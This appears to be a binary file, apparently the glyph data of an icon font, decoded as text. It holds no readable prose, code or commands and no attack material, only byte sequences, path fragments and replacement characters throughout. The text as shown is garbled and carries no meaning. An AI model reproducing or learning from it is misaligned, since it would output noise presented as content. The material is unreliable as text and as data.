+2+"&=46;5462264&"754&"�;R;t  f$4$��();;)(�  �($$(��1@.B@?jja
	+2'"#"54?6765'uy�iy�gs����)-)B)-(���,�@�@:@7YYMQE
	+=!%5!%!!���������@++k**�+����!+13R@O%/.32Bh[OQE,,,1,1)(#"+%''#5.53327'#"&='7''5462'65'<:::"_!.9P'H1 
)�o�	�)8)\R"]:::!_RRX92C!(�n�	M�((�.&�!�@�!@OSG+62"&4$2"&4&2"&4    `  �       P`+@([[OSG+"&462"&4626"&462P      H  ��  `  @��(+''�������@@��`�&,O@L$ B[YMSG''',',*)
	+#3/=4&'.2!57546754"&5�",	�	,"-;)��);-H"H9$r


r$9H
I/r**r/I
����l� 7@4
		BYMSG+"&53'!57547'7'675462�"R�'$��)?%�-;L��$)s!@�^�

I��`�,@)
BYMSG+"&537!5754675462�"R^)��);--;d**r/I

I/��K@HBhfYMTH%3	+%53#!"&546;#3#5'7#U+������+��W+��*+��U�W��	����'+/;�@�

Y[	Y
O

[YSG,,((9832,/,/.-(+(+*)%$
+=!353"&=462%5335!"&=462'5!353"&=462`P`��P`���`P`      `P     `P     `0�P	&L@I%B	[O
O
QE
! &&
		+%"&4632#"&46322!54%2#54&'61$$$$�$$$$FZd��12]��#2##2##2##2#,& 66 66��9@6	OYO		YQE
+$"&4622!5453##5#5353HP88P8�x���@@ @@ �8P88Ph5+00+� @@ @��!@[OQE+6"&4622!54�P88P8�x����8P88Ph5+00+0�P!@YMSG52+%#!"&=463!2!5!���n�� ��Y����� �0@-YMSG	+2+"&5463#�������n�� ����@�!@?kOSG+2.54264&"^�^P((7*#�0!!0!�\A4�/.HDV!Ay!.!!.����@
	?a+%''575575462��0PP0���p0rr0(hq

qh��
�K�	PX@,`
YY	M	QE@-h
YY	M	QEY@	
+2#!5#54635#!5`&P�P&�� &�UU�&���`PP����!@[OSG+2"&4264&"z�zz�z��aa�a�z�zz��a�aa�����+@([[OSG+2"&462"&4264&"�V==V=�zz�z��aa�a(=V==V�z�zz��a�aa�`pI@FB@hf[OSG
+72673#"&46327#7&#"�*C.]<IggIH44�F&67MM<.&8Hg�g44�F(MnM����(@%YMSG+2"&45#z�zz�z;��z�zz�k**���	(+7'&47''67&67>t[�V!����0M0
@�YE�����0>0K����
%:@7[	[YOSG#"
+62#62"&4264&"6"&462"&462�B6��zz�z��aa�a���#z�zz��a�aa�Z����$:@7
$B[[OSG##&+$2"&547'#"&46327&5462#"'&4$$4$�&%�&4&&��h$4$$X&4&W
&&4&W


X��	�(+%'7'?/?/�n!}}!n�99(<5F�`�KK�`���$D.@���	�(+%'7'?/?/?�n!}}!n�99(<5FF5<�`�KK�`���$D.@@.D$
��`�%)��BK�PX@/`
Y
	[PQE@0h
Y
	[PQEY@&&&)&)('#"+2#!57"&=4264&"75#264&"75#\�\+ � +Bpp�@p�"3�++�3��~``�~``
����#'+/�@�
($+)'%*&
BY[	
Y[

M
Q

E,,  ,/,/.- # #"!+"264'#5'%'2"&4#5!#5/'#5P88P8K*�&��&&�hLLhL`@��@n&&�&�* 8P88P�@@,&&&&LhLLh****�&&&
@@��@�C@@
B@?[OSG+2'654&#'755"&547�B^G1PPPPB^Gc`C0'2H=RQ��=RQ=`C2%2H��N@K	?Y
	M
	SG



+2#!435#35#35#X��@ f&s&s&��@X(�((((((����9@6Bh[OTH+2"&4264&"7'5}�}}�}��cc�c�`p�}�}}���d�dd��o9C��`�C@@BhY[OQE	+=462#!57"&6264&"75!\�\+ � +�  ��e�3""3�++  �``��@�%C@@h[[OTH#"		+2+"&=46;54&"#462264&"��$4$&;R;t  ��($$);;)(�   �`]�BK�	PX@!jj^MTH@ jjjMTHY�'4+%#!"&5467>323'33�'6;)��2F>-G+6RhDddD@�9();F2.D%,EoddL p!@
@	?MQE+37'#%5UkkU p��p@0�1�p@@?MQE+37'#UkkUp��p�� '9@6$#B% 
	@
		?MQE+%4&'5'6'''567''#537'7'5V</@U �3�($._kUU	[3�3R-lE6* �h3��(!
-
_�p�
[�3<1��%@"
@	?MQE+37'#%5'5>4&'UkkU 5@UU@/;;/p��p@0�1�l�l-RfR���W@T	B
Ahhi[MQE#	+"&462'#5'##576323�  (9&29(Q)(o	-HP  �&>`�`D�@Pp&E(����
@@=@jYMQE

	+'5#75#���000��`@00P``��@�!@[OQE+#'&4?3264&"@=�==��FdFFd
�0ss0�0ssKdFFdFp!4A:@7</!B[[OSG437;+%"/"/&4?'&?627627#!"'&/763!24#!"3!2�LLLMLLM�
��
nn%*��``
*tMMLLLLL�
�	
������p40@--$
B[OSG75+#!"'&/763!2'76/&"'&"2?2?64�
��
nn%*HLMLLMLLLb
�	
���LLLLLLMM0�P3VP@MTSK!PD@=-"BhfOSG54;94V5V$++7676'./6767#"&54632&'.#72#"&'675&'&'&'7&/5>�&	(&-
S! U'� L#ER�"3
"PW98XB 	

�X89W?		"
B����E@Bj	YZMQ
E

	+5353!#535335#53@@@��@@@��� 00�@@@���@����#x@u
k		YYY[


M

Q

E   # #"!+75!72#!"5435!73#73#'530` �`����@� � p�������PP�00��P 00 �`*]�@-'G+J52BK�
PX@2`h	[
[OTH@3hh	[
[OTHY@UTSRQP:6/.*)+$42%3"/.'.'.'&'&63673+"'&=4?3272>76'`���
6
	H��		#'Sbb�@	q1��
	]S		S~�.4<�@1.&BK�	PX@/	j`		[[MTH@0	jh		[[MTHY@
:9%$##&C
+%+"'&?5432632#"'3&54632&=4323'&"&462~��v		#H.5!


ǖP;
��E6
�����3BP^�@MJHGCXQ	B4	BK�PX@>h^		f		fY[
O
SG@?hf		f		fY[
O
SGY@^\WULKFDA@;831('=3+%#!"54?6=4&5&6;2654/&=#3!7+"&54?3'32?4'&"6/&#"32w	?��?	11~?e@c�	QgRW14
44IM &\])��%2pp0'�%	||F=$$����*=EM�K�(PX@>
`f[	[[

O
S

G@?
hf[	[[

O
S

GY@FFFMFMJICB?>=;7532$$"$##%$+%#"&'&763232676327#"'&"#"'&7632#"'&"#"'&7632&2"&464&"cJ./L
<&%<
	
		
�
		

�����0pp�pp�"'("	9
	



	


��������p�pp�p����3;CKQu@rD5,(#+*! 	E4		
B		h[	[

ZOSGQPONML&&7>+''#1"''7&547'&546732674627'6;%7&4&"2654&'&3#53�6	9+$#4FF4#$+9	6."6*0
	1*6".��[
%Z^�^^�[%fp`4	4NA1-
+11+
-1BM4	4!04

40!Y(��\\�\cY(X�����39Z@W,+*(#! 
	BYYMSG4449497>	+''#1"''7&547'&546732674627'6;5##�7	9+%
#4FF4#$+9	6."6*0
	1*6".�`4	4NA1-
+11+
-1AN4	4!05


40!�����I@F
Y	YYMQE

	+!!!75!%5!��`��@(p��00��0��@ ��@@=YYMQE
		+!75!%5!��@(p��0@��@ ����/8dW@Tdcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:95.B[OSG86('+#"'.?6327&#1"7&'&'&'&'6'&'32''7''7''7''7''777777'7K('�U('��*$9/M�"/M�Q*$vCC;[TKU[TK65��/�!:"/�!:q65�CC����CGL@IGFCBA@?>=<;:9876543210/.-,+*)('&%$#"! 0BOSG('+#"'.?6327'77''7''7''7''7''7'77777'K('�U('���HCC�;[TKU[TK����CC������_N@KQDC8B	
h[[OSG! ^]YXTSMK=; _!_+"27>764'.'&2"&4"'&76767>76?67632'&'&#"'&'.'&"V&#>>#&V&#>>#������L

	
!

 �>#&V&#>>#&V&#> ������( +
#)%-����FE@BD9"(BhfiOSG><'&	+2#"&'547>654'.'&"3767>76?67632�]�zN[�
~%>#&V&#>
$
		��]J`�[Tr�+&#>>#&+	(-, �`�(+'17� ��@�� ��`@ �(+'7-��� ��� �`�(+71'7 �� @ �� � �`�(+'7�����M���� �`�(+7'7���M��� �`@
BOSG+7"/&64276�WXJJ~OPC��C`@#@ BkOSG!++7"'&'&4?6!2#!^OPC��CbWXJJ`@#@ BkOSG!#+7&?!"43!'&6"�C��COPbJJWX �`@BOSG+/"5&76762�JJWXC��COP`@ �(+%''7-����`����9�Gu�q@n
�{yLD;:
B.Ah

hh[
[	[		O		S	G����~}om.'-.(
+753#"'&'&'&5476767632"'&'"'&'.547567>32733276767654'&'&'&#"32767676'6?&'&'#'&'&#"327676�


			


"	&


	




V
	



#		

	f



		 
 9
	
	9Gv�r@oF������K-Bhhh		[[

[

O

S
G�����~rpb`!/&-.(+73#"'&'&'&5476767632#"'&'#"'&'&'&54?67676327333276767654'&'&'&#"327676'6?&'&'+5&'&#"327676�





		'	
		

F	�

	#			


	h		
/7
@�@#}@zY
		Y
Y

YMQE   # #"!

	+53#33#535#53!5353#53753P@@PP@@��P�7@��ఀ��� ������@�@�K�PX@=`
^^^Y	
M	
RFK�(PX@?`
ff^Y	
M	
RF@Ah
fffY	
M	
RFYY@+

	+!!75#5#75#5#75#��`PPWYP@�@�� ������ ������"Ks��@����������������������FEB?>=<:9875432.-,+)�~olGD��������������|{zywtnmgfedba`_]\[ZUTSR")Bhf[OSGsrPNIH'/a$+%#"+"&=46=>71632'4&#"#77777346%;&5'7&'.''7&''7&''7.'&''7.#>7&''7&''7&''7&''7&''7&'77777�jIVzgIVzpO	


��pO	


	�B_
	
		B]	

		�IgzVIjzVOp

	Op	


	�]B	

_B		



����S��@����������~}|zvutsonmljihgedcb_\[/-,+*'&(������]ZXVTRQPOJIHGEDCB@?>=8765(%#"! /Bh[OSGyx21
+21#"&54671627&'7'&'7'&'7'&'7'&'7'&'277777765&'7'&'.'7'&'7'&'7'&'&'7'&'"7777�Vz	vPVzjN		

		



	�


			
�zVNjzVPv	�q



			


	�	



		����%-7CNV�@2 
S$U/"
OMD?=6,*(&

Bhff

h[
[	O	SG88RQIHGE8C8C54+2"&44''&#236742'67&67&'7'&'6'67'&'&3263&'&'67&'z�zz�z�>'3B!�K5^KA#,/)!I
EY\?�+:,#$8Q
1�;D7:�z�zz�VS92-

�(&#/.(;)N<y7HJB
E')/F+C5"�:&!&"3M,B����Q_@\.(1*
PNLJDB=4BjjjjjjOTH	+2"&4&'67465&'&'67&'"'&'&'"#&'&'6727&'676z�zz�zM:7D#!AK^	YE
?\#$#,:41
,6!�z�zz��HB,

-2./#&W<N)'E
F"	&!&H7>J	��-37@4B[YMSG21/.'&! +%!>	5475462!&54'&""&'3>��

ff��*(%X%�(h�#

y	

	��(fE FK#_��%+@(BYMSG$#! +%!>	5475462"&'3>��

ffj(h�#

y	

	������@w�@qp54mgYSQ
BK�(PX@M`	

`
f

f


fi[[

O
T

H@Oh	

h
f

f


fi[[

O
T

HY@&BAlia^WUJGFCAwBv<90.)&" @?+"264&2"&42+"#"&/&+"+.?576'&+"&463"43!2+"1#"/4'&'&+"+"'&?5716'&#�4((�

d 
	

 d

Pf 		 �"((T
&�
	xx
�&
 (�x
x�*����:I@F/.B$#?k[OSG64"
:9+422+'&/'&'&+"5'&'&?576'&'#"&463�`x

b		b

@``
(�		x		!x		�(
��	+@(
@
?YMQE#!+;7+?37#�dAdA.`�`<�Y������@@?ja+37#�`�`�����"2@d@a5!	<#B@Ahfi
	[		O		S	G?=8620/.*( 

""
+2+&#"#.#"+5=46326=.#"36327=&#"632,86..98,G/$#/96�P%/6;�)&��*%%*		&),,���
��$�5!��+$��%I@F$Bhi	O	SG#" %%	
+2#.#"+5=4632+&#"#6d;.98�,86.���%*		&))&��*%a��,3FY@V;:920.ABk	[
O
SG--EB><86-3-3,)%"
	
+2+"+54+"&546;21634&+";2?54+'5#"6;26����

"	�	�O		@ 00	�	���

��5��@dd���  �����/B@?.-,&%$	BkOSG+)!
//+53/72+"+54+"&546;2746;75(@	P���00tt_��


��I	�  �0@P $i@f

YY
[	[		M		Q	E!!
	!$!$#"  
	
+7+";24'2+"&4637#!5#55!%5!�?@@��� ����  pP��P���000@P:@7Y[OQE
	
+75!'";24#'!#!# �@�@��0���  �P��".c@`		[
Y

Y

YMQE###.#.-,+*)('&%$""! 3+3!3533=4;2353354+"5!%5##5!#5#p0�`0 0c0 �a���  �  @��@ �����00��"*�K�PX@:
		`[Y
YMQE@;
		h[Y
YMQEY@1###*#*(%"! 

	+535!5313!53353=4;233'54+"0 P�P 0�`0 0c0 `a@����@@@     ���K�PX@2`
YYY	M	QE@3h
YYY	M	QEY@

	+!!%!#53!#50�� ��p@0��0����p��0@��	*@'hYMQE+!!!#5#0��P0@�0������ �#+3;CKS[c,K�PX@g

`
	
``"[!Y 
Y	
	ZZZOSG@j

h
		
hh"[!Y 
Y	
	ZZZOSGY@M	ba`_^\ZYXWVTRQPONLJIHGFDBA@?><:98764210/.,*)('&$# 	#+53'3572+"&54634+";2';#53;#53;#537;#53;#53;#53;#53;#53 ������� @ @ @P @P @P @ @P @ @@0  0��@��@���@p@p@�@ @p@p@ �`
 �#'+/3n@kY
Y	Y		Y
M
SG3210/.-,+*)('&%$#"! 	+2+"&5463#35#3#35#35#3#35#35#3'35#��0000P000000P0000000�����@؀�0p0�0�0p0�0�0`0���K�PX@:^
h
Z	Y		M		Q	E@9j
h
Z	Y		M		Q	EY@-

	+!5'3!3533535!5##5##5#`P`��`�P��`P�PP@@��`   ����@    @���K�PX@0`
		Y
YMQE@1h
		Y
YMQEY@)

	+1!!5335335#53353���`����`PP0000    0�P;CKOS�@�/"B[M
[



[Y[	[		O		S	GPPLLPSPSRQLOLONMIHEDA@=<;830*(!	+2#!"&=46;533>;254+'&'./#"+"3!2&2"&4264&"75342b

��
"
XL>X	<@�F33F39:)):)��@ �
�
ϰ	�
�2F22Fh)8))8^b@@0�P#'/7m@jh	

	
h[
Y



[[OTH$$5410-,)($'$'&%! 	+2#!"&=46;533>;2264&"75#&2"&4264&"b

��
"
X�F33F3�}:)):)8 �
�
�2F22Fe)8))8<��.2I@F21
B

[		[[OSG+*)(!%+62"&424"62"&424";#"'&/&'&#527%V�H����
+!(�� 0 �0"��c���&6@3B[[OSG!'+62"&462"&4;#"'&/&'&#52V�X����
+!0�0"�����	��BK�
PX@<h_Y		Y
Y


M


Q
E@;hkY		Y
Y


M


Q
EY@

		+3#5!#5!##'#%5!35`p � 0
@���7���p`p�@@��77����
oK�
PX@(h_YMQE@'hkYMQEY@

	+##5!##'# �p� 0
@��pp��@@ �`@e@b<;:/	Bh
		h		fk[O[SG42.,,+!$!!-+"76;6323327654&2#"'#&#"3#"+&7654'1'&54	�g
'
 &H52��qoP+ 2	PQ9&#	)
('79aZ@?W9&.@ �`"C@@Bh^fkPSG$ !$+2#"'#&#"3#"+&7654'1'&54q�qoP+ 2	`Z@?W9&.@r�@@a+7"/77J
8/}v8/~����4@1Bh[OSG+"/72"&4264&"$�
8/-�zz�z��pp�p�8/�z�zz���p�pp�����'@$

	BjOTH+2"&47''2z�zz�z��}/8
�z�zz���~/8����+@([[OSG+2"&4264&"62"&4z�zz�z��pp�p}�^^�^�z�zz���p�pp��^�^^�����!@[OSG+2"&4264&"z�zz�z��pp�p�z�zz���p�pp�����:@7h[ZOSG+2"&4264&"753#5z�zz�z��pp�p�q�z�zz���p�pp�O������
1@.hYMSG

+2"&45##z�zz�z�`�z�zz�g��`� �(+''7'7�TTTTTTT TTTTTTT����@@=B[OSG+"&4664&"''7'7&zz�zz�nn�nn�TTTTTTT�z�zz�z�rn�nn�nTTTTTTT����/@,

	BOSG+"&46'7''7&zz�zz�TTTTTTTT�z�zz�z��TTTTTTTT����DZ@W<	D B?h
	
[		[[OSG@>;9!)%##1#+7537'72+5;264&+54&#"'&#";#"&5467>32>321�77KJ�"/0"ea&';*1


	+[[%5"!9"0EC6��6II�0D0'6()8	$,4%-	#C0����(A@>( B?kOOYSG#'A#+7537'?2+5#+"&5467>32>321�7KJ�"/0"�#F%5"!9"0E
kk6II�0D0��4%-	#C00�P8I@F)B[[[OSG-+&$!86#'4	+%2#!"&5467>32>32264&+54&#"'&#"3!o"/0"��%5"!8"0E'&;*1


	+�0#"26&-	%E0�)8'*9 	%-��DW@T=	D!Bk
	
[		[[OSGA?<:!)%##1$+7'7'#572+5;264&#'54&#"'&#";#"&5467>32>32�JK7�"/0"ea&';*1


	+[[&4"!9"0E�KK6��2#"1'8**9 
	(,4&/	$D0��(L@I(!
BjO\MQE%# 	+3532+57'7+"&5467>32>32��"/0"�7KJ7#<&4"!9"0E``2#"1�6KK6�4&/	$D00�PO�BK�PX@j^OTH@jjOTHY�#'4+%2#!"&5467>32>32o"/0"��%5"!8"0E�0#"26&-	%E00�P1U|@y	4
	8BMHFD@	
	
h

h
[	[

[OTH32=<2U3T.-)&#!11+7""#;264&#"#'&'&'232+"&5467546276767&'&'&547&'>7673}%

�*&&�."2"&		
,#$2�%

(#&6'  .b

'#!*()	3#$/�P3�@B@K�PX@2^j`ffOTHK�PX@1jj`ffOTH@2jjhffOTHYY@! 0/+(%# 3!3
	+%27#654'&'&'&'5>7673'232+"&5467546i!3 
,#$2�*&&�.�
&")	3#$a#&6'  /` 1^@[		B		hf
[	[OTH.-)&#!11+""#;264&#"#'&'&'232+"&5467546}%

�*&&�.%

(#&6'  .` ~K�PX@^`OTHK�PX@j`OTH@jhOTHYY@+232+"&5467546}*&&�. #&6'  .��?�����@�3,XWVQPO7542-+*(]\YNLK8'���������~{nkjihgedba`_^ZMJIHGFDCA@?=<;:9&%$#" <}|lzyxwrqpom

	B6)AK�
PX@2^jh]\OSG@0jjhi\OSGY@������������utTS0/	+%'''#/'7''7''7/5?'77'77'7?3777'?5/7''7''7'/#'/'7773?7'77'7&2"&4?&#"27'7654'&'�!"
 	
###$ 	 	#!    	 	!!!!!! �jKKjKh.Bp) Kh	!�!�"!!"	 	
 #
###

	P!!"!!" 	 ! �KjKKj5hB�K!&+.!i��X`�@}PNMLKFEDCA
Q@XVUTSR?>=<;9865432
 1 0/.-,+&%$#"!BOBA[[OQE^]ZYIH)($.+'7&546327#"'&%'''#/'7''7''7/5?'77'77'7?3777264&"�!K
hB.rhK ).!!!"
 	
###$ 	 	#!�jKKjK*!.+Kmh.B�K!,"!!"	 	
 #
###

	�KjKKj�p)4=FO\it@q#
cXIG@>:
/,iR3B	

h
f[


[OSG^]QPOMLKEDCA=<"'"%+%#"'#"&5467&5462'632632654&"4'"'6&263&'2'67&#"#767"&#"27&547&'2654&'.$.B.0  0.B.$B\B�
0  0
8P8p
(T
0(�P9(�P8(9�
<&.B""B.&<
.BB.""(88�=.
.�$83!(88(!38$�pDOXaj�@.3+6(:$
fd`TR/
ME	ID	B9AK�	PX@Eh

f

	`	
	f[

O

S
G@Fh

f

	
	h	
	f[

O

S
GY@)cbPPihbjcj^]\[ZYPXPXWUON875420.,*)'%"%+%#"'#"&5467&546267654'6767'"#5&"'&#"&#"""17&54727&'632""&#67'2&'26.$.B.0  0.B.$B\Bp9
0  0
9P0
(NT(
0�
<&.B""B.&<
.BB.�$8
""
8$^O.
>1
.	��#n@k#"! B?Y
YMQ	E
+7/5353753!537''?'7�"�7��(P(�((�*�" ��d((�((tb������n@kB?Y
YMQ	E

	+75353753''777'53�"�   <@"--�----9@!��"C@@�@@x  b-..z-.\  ��	J@GBjhYMQE
		+%57!!#?#577/7620���� ��� ��0��� �����?@<	BjYMQE
+?!!7#57/762������ � ����0�@� � �����8-@*5)'
B[OSG" +2"&4$"67654'&'&'&756'&7673654z�zz�z�p-(2	''
2+-�z�zz�ipOE5



	
5EO����34@12&%
B[OSG	3	3+2"&427&'&54767676'&5&76'&'#z�zz�z�X:+2
''	2(9�z�zz���E	



E ���BK�
PX@=
`


YYZ	Y		M		Q	E@>

h


YYZ	Y		M		Q	EY@(

	+3#57##355##%5'#�@P%K0�0�� A�`@P K��0P0�� ��0�B�� ���	BK�
PX@0h^Y	YMRF@1hfY	YMRFY@$ 
+7;#3+55#5# �� �K0��@  P��PK�� 0p@P��	
R@O		hk
Y		YMRF




	+533#5353!#!@ �� �0��@ ��P00� ��  �� ��	
R@O		hk
Y		YMRF




	+533#5353!#!@��0��@��P00�����0@�7@4
BjYMRF+3!3#!#537'�����p p_77JJ0��0��\7��7JJ@�6@3
	BYMQE



+3!3'7''53�����7JJ70��0�7JJ7�PP�`?@<YYMQE
		+=!%5!%5!`��`��`�88@�@.@+
	BYMQE+!!?!!5'''7'�������
`sDO00ODs@�t|��XMF%%FMX@�@+@(BMQE



+%!5777'7''����DO00OD���@�dMF%%FMd��P�0 (0@o@lBAh
[
[

[		[[OTH?>;:985421.-*)&%"!  (%+%#"./767632"32>7&'&"&462&"2643"&463"26266'G&%7'01^^,N06*4#G'%%/B//B/64&&4& (�2$""%8/16#")�/B//Ba&4&&4(P�0'o�BK�	PX@'`[[OTH@(h[[OTHY@	%(%+%#"./767632264&"7327"&463266'G&%7'01^B//B/J(�2$""%8�/B//B>(@�@
�
(+?7'5�(������%�edN_d���{{{@�@�(+5�����@��{{{@`@	!j@gBAY

Y		[MQE

! 

		"++57''32653535#"&'#3 @��@
-�0(0�--b#,#b�@`��``DDPPPD���@`@
"��@K�PX@/j	`		f
ZORF@0j		h		f
ZORFY@
"
 !+62673+53'+735335+"&5+�,#r��r79@�@8(('	���%`PPPP`
�h#'+/3�@�

Y%	Y$		Y Y#Y"Y!
M!
QE00,,(($$  030321,/,/.-(+(+*)$'$'&% # #"!

	&+!!75#75#75#75#75#5#75#5#75#75#75#75#��pH888888888(���(888888888h��00@00@00@00@00�������00@00@00@00@00�h#'+/�@�

h

f

Y"	Y!		Y YYMRF,,(($$  ,/,/.-(+(+*)$'$'&% # #"!

	#+!!75#75#75#75#75#5#5#75#75#75#75#��pH888888888(�(888888888h��00@00@00@00@00p�00@00@00@00@00 `1w@t	)*
Bhk		[
[

[O[SG1/-+(&$"! 
	
+267##"'&#"#=76323265"#"'&#"63232�

!(9+(:		0( 
9/P�	
���	��	�
	 `I@FBkO[[SG
	+267##"'&#"#=7632326�

!(9+(:	P�	
���	����<@72-!@a'+#"&'4>654&/76'&'&54?67676`G`"+" _! (

)
y0"11	.-	�5�M/DSM(?)*>�p$,(

$,(
�FQ8+<?3& ..		-/����@
@a'+#"&'4>654&/`G`"+" _! (

)
�5�M/DSM(?)*>�p$,(

$,(
����9EUv@s92	B
YYY	Y	
	
YY[OSGPMGFC@<;8764+($#"!!4+%#!"&'4?5#5;3#3#3#3#3!27654/=;#73+"547#1;2764'1u#�%t00  001:\
	t�H�H
,�.�C	�	N%$�  �$
���ww((xo
����"&*.2>ڶ"
BK�(PX@L`Y		Y
Y



YY[OSG@MhY		Y
Y



YY[OSGY@+//++''##>;76/2/210+.+.-,'*'*)(#&#&54+%+"&547173#!"&'4?5#53#'353535354/#;2G	�	C�q#�%t�p00  0A	:�
H�G.�,A
ob%$�o000�ww(����S`kv������������&4=KWeqAm971���"<�$-$L'mldcA: B�O,�zy[UT
%
bX������i*#�( ����B�"�$�(AK�PX@�  h&%  ^#f)
`,+^f"O
$[$'$'[[[	
\.
-
[P([/*(*([["!"[SG@�  h&%  f#f)h,+ff"O
$[$'$'[[[	
\.
-
[P([/*(*([["!"[SGYAhhfxwnmlkfqhqed][WTQPONKIED42����������������������������}{w�x�qpkj`^XVRPHF>=53+)(&	SS0+%"'#"'&'"547&'#"'&767&'#"43267&'&763267&54267632632'32767&'&#"'676765"7&'&#275&#"67'2734'.3654'&'654'#6&264&"#"'6&/6'&'&'&763247&'6?#"'&67"'332%&6763267'"#"2>?#"'&7674&5>'6326'6.&7632263&'&#"##"'./237&'"#k%82<-8-<28%UU!<4<,8,<4<!U�+ '
�'
6 +/
P',�(,\
y

r
m""9
{*"!"

		�
�

�	
).
d.		
)

�=-2<!UU!<2-=8 <,2<!UU!<2,< 8
_'
f''
P
_',
g'(
,//�|//

��2#""=
l"#3@�
�$	�	)'

�.			+'.
:
}
$
	����IUamy����@5�^
�
<5
�nH)"��b		�RBV~JAK�
PX@T
`

^
f		h^^O
O	\

[SG@X


h

f
f		hffO
O	\

[SGY@*������������xwsqlkge][QO98(&%#II+%2#"''&'"547&'&767&'#"43267&'&7667&5426766#"'6&/&'&7632#"'&76?67632&>?#"'&>'632&7632.#"'./kUU%82<&=8=&<28%UU!<4<<8<<4<BS8")"�!*"��
��.
	
)E.		
)�8=&<2<!UU!<2<&=8 <<28%UU%82<< ~"2#"�#3$"�R
�	)'_			+'�X
��'4N@KB	[[[OSG41-*# '&	
+2#!"&546;23'"63!254+"/&#54#!"3!2�


�p
p
�	��
'�p�`
��
P

J*������
!k�BK�PX@!^\OSG@ j\OSGY@! 
+2#!"&=43%2&#!"546;23�
�p
�

�Pp
�
�P
*J

����#*.5=DINS�@IFEB=4321/.-+'&%#"!D:
		OMB`^[	Y
	
	YOTHRQKJHG?>98)(!+2"&42637'5#2332?75'37&'7&'77/767''7&"''67z�zz�z�j�+R9!1GNFEhy#7:G6��F1�F62C/0+6 +�+ 8�z�zz���@''A(1%�/@<:�::HH2(5F1(:<>3)'M�)3.M� ��%22%����&.5\@Y53.+%$#" 
B	h^^YOTH0/*)!
+2"&42637'5#233275&'77/767'z�zz�z�jT9!1G�#7:G6��F1�F62�z�zz���@''Ar/@<:1(:<>3)'M�)3.MR�.#+3<LX�@�[

[	[
		[[[OSGNM?=54-,%$TQMXNWGD=L?L984<5<0.,3-3(&$+%+" ##
+72++"=#"=4;54;22#"4'2#"&4632#"&46'2"&547#";27654&'2+"&463�###�]#�'8&�&8'.AA.�.AA.�####'&*&&*!4)**)4>^@@^>R�.'/7@H<K�PX@O

`		`^^^

`[[
OTHK�PX@Q

`		`ff^

`[[
OTH@S

`		hfff

`[[
OTHYY@2BA10)(ECAHBH><98640717,*(/)/'%# 
+2+"&46354+54+"#";;2=3224#"264&#"6264&#"24#"Q.AA.�.AA.9####x2>.>^@@^>y####&*&S5& �`#+O}�@�iP
B[[		[[
[[[

[OSG}{urlja_]\ZXLJIHGE=;8520)(%$! +$2"&42"&4&2"&424"62"&42"&4#"'.+"#"'.7>76322632>&'.'&#""'&#"32767676;2328�  &&�8Z+ ;; +' 

:6:

 '$	(4(	$

>>
� L""$&- !BY	4		4	YBFF		F�E-C?

?C-E �`'/7?GOy@vh		hh

h
fk	[
\


O

[

T
HMLIHEDA@=<985410-,!(#3%+62"#"'.+"#"'.7>76322632264&"264&"264&"6264&"264&"T&&^+ ;; +' 

:6:

 '��  �88�&BY	4		4	YBFF		FU""8L8��_��@��h
	N��mjLD$B&�oB��b`XV@|zwu:80.?	
	[

[[[
[OSG�����yxrpge][.**.*+2"&4264&"7#"'6326763267&76763267&'&54767&'#"'&'&7&'#"'&7327&#"&"&'6'&#"&'64'673276'672�P88P8?B//B/								_    D    D 8P88Px/B//B�				 D    D  ��3;P@M13B+)&$@
?[O[SG&)&%+$&#"&"&'6'&#"&'64'673276'6727327264&"`  D    D �B//B/�D    D    ~/B//Bd�+3;U@R%"
B	
[[
Y

O

S
G985410-,)'#%#+%3##"&514&"1#"'&'#536763262>32264&"264&"�#&66&#$ 1"1 #x@--@-�@--@-�"6&&6"!%%x-@--@--@--@d�+C@@%"
B	O[Y	SG)'#%#
+%3##"&514&"1#"'&'#536763262>32�#&66&#$ 1"1 #�"6&&6"!%%��L@I
	
M
		YY

Q
E+#3##5##5#535#535335335#�ppp�pppp�p���pppp�pppp�����#n@khhY	
Y
M
QE##"! 

	+753!!5#5##5##3#33533535#5������`P�PPPP�PP�����PPPP�PPPP��p=-@*9'?OSG+)%#+2&'&'&54632>67654'&'&#"'&#"67>G5D)(<*	7<()D599c		>>		$&*  *&$p>6721'$'1276>�/--/  �p@?a+2&'&'&54632>G5D)(<*	7<()D599p>6721'$'1276>R�.bK�PX@&`f[OSG@'hf[OSGY�!&+6"&4627#67654&#"#432K


D"R


i&>����%-�K�PX@7`f[
[		[OSG@8hf[
[		[OSGY@+*'&$#!%%+2"&4264&"72#67654&#"#42"&4z�zz�z��pp�p�#=


�z�zz���p�pp��&>�


����'<@9hf[\OTH"'+2"&4264&"7654&#"3&632364>z�zz�z�


3"D	�z�zz��


i>&

��U@R

BA@YYMQE					+#5##55'353''7535#��p`p0��P�@��� @ P�Ѐ���tt���p���`-
*C��5@2

	B	@hMQE+#5##57''753��p`p���� @P�Ѐ�а���`-`� 33@0/.B[OSG%%#%%%#$+#"/&#"32?#"'&4763232764'&#"'7632�('~"!!"+
*(''(~!""!+
*('N{@*)N{@*)X�(13@0-,B[OSG%##%%%#$+#"/&#"32?#"'&476323264&#"'7632�.-}''.--.}((''.-
V{8&&V{(:(&&`@(
9@6[YMQE

	+423#535#53(@0((�x����
P@M

[[Y	Y		O		S	G

	+423#535#53&2"&4264&"�(@0f�zz�z��pp�p((�x�z�zz���p�pp�����>@;[YY	M	SG
+2"&46"2645#5#3#z�zz�z�0�z�zz���x����=EM_@\(!BA[[[
[
	
	[OSGKJGFCB,"#+"&4632632&"26467654'&'#"&547&'&"2762"&4264&"z&y�{{VB6




"R""#$N$#�P88P8?B//B.96CVzz�z&$


��%$&'$
#$'&$%8P88Px/B//B��	!+3;CKS[cmu}����@� #["!&[[

[%$[
O
S	Ged#"����������~{zwvsronjidmema`]\YXUTQPMLIHEDA@=<985410-,('"+#+
		'+%2"&546264&"&2"&4264&"'2"&46264&"$2"&4264&"&2"&4264&"&2"&4264&"%"&5462&"264&2"&4264&"&2#"&4264&"K.  {,,%  f.  $..&  {,,%  }..%  ;.  �,,%  }.%  k.[  F..<  F.[  �,,;  E,,;  E,,;  e.[  %..=  E.=  	��	#+3=EOh@e

[
	[OSG54MKGFCB?>:94=5=10-,)(%$! 
		+%2"&546"2"&4'2"&46$2"&4&2"&4&2"&4%"&5462&2"&4&2#"&4K.�,,V...k,,m..K.�,,m.k....�,,,,,,?.k...�� �9=AE{@x80-*'Bhf[
Z

Y	Y	

	M		
Q
	
